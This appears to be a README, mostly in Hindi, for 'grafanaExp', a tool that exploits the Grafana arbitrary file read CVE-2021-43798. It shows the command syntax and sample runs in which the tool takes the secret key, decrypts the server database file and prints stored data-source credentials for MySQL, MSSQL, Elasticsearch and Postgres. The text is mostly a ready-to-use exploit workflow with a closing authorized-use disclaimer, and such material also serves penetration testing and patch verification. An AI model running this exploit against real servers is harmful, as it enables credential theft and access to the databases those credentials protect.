
grafan CVE-2021-43798 मनमानी फ़ाइल पढ़ने की कमजोरी का उपयोग करके, स्वचालित रूप से कमजोरी का पता लगाएं, मौजूदा plugin, कुंजी निकालें, सर्वर-साइड db फ़ाइल को डिक्रिप्ट करें, और data_sourrce जानकारी आउटपुट करें।
grafana CVE-2021-43798 मनमाना फ़ाइल पढ़ने के भेद्यता का उपयोग करके, स्वचालित रूप से पता लगाएं कि भेद्यता है या नहीं, मौजूद प्लगइन, कुंजी निकालें, सर्वर साइड db फ़ाइल को डिक्रिप्ट करें, और data_sourrce जानकारी आउटपुट करें।
exp और decode कार्यक्षमता प्रदान करता है।
➜ ./grafanaExp -h
NAME:
grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.
USAGE:
grafanaExp [global options] command [command options] [arguments...]
AUTHOR:
A&D-Team
COMMANDS:
exp -u [url] -p [plugin] -c [config] -d [db] -k [key]
decode decode -f [dbfile] -k [key]
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--help, -h show help (default: false)
स्वचालित रूप से पता लगाएं कि भेद्यता है या नहीं, मौजूद प्लगइन, कुंजी निकालें, सर्वर साइड db फ़ाइल को डिक्रिप्ट करें, और data_souce जानकारी आउटपुट करें:
➜ ./grafanaExp exp -u http://localhost:3000/
2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]
2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]
2021/12/07 22:19:10 type:[mysql] name:[MySQL_01] url:[test.mysql.io:3306] user:[root] password[rootpassword] database:[test_dbname] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 type:[mssql] name:[Mssql_01] url:[test_sqlserver:1433] user:[admin] password[adminpassword] database:[db_sqlserver] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 type:[elasticsearch] name:[es_01] url:[http://localhost:9200] user:[] password[] database:[] basic_auth_user:[basic_user] basic_auth_password:[basic_pass]
2021/12/07 22:19:10 type:[postgres] name:[Postgre_01] url:[Postgre_01:5432] user:[pppp] password[sssswwwww] database:[postgredb] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 All Done, have nice day!
जब DB फ़ाइल बहुत बड़ी हो, तो पहले इसे स्थानीय रूप से डाउनलोड करें, फिर स्थानीय रूप से डिक्रिप्ट करें:
➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm
2021/12/07 23:00:20 type:[mysql] name:[MySQL_01] url:[test.mysql.io:3306] user:[root] password[rootpassword] database:[test_dbname] basic_auth_user:[] basic_auth_password:[]
2021/12/07 23:00:20 type:[mssql] name:[Mssql_01] url:[test_sqlserver:1433] user:[admin] password[adminpassword] database:[db_sqlserver] basic_auth_user:[] basic_auth_password:[]
2021/12/07 23:00:20 type:[elasticsearch] name:[es_01] url:[http://localhost:9200] user:[] password[] database:[] basic_auth_user:[basic_user] basic_auth_password:[basic_pass]
2021/12/07 23:00:20 type:[postgres] name:[Postgre_01] url:[Postgre_01:5432] user:[pppp] password[sssswwwww] database:[postgredb] basic_auth_user:[] basic_auth_password:[]
यह प्रोग्राम केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए उपयोग किया जाना चाहिए।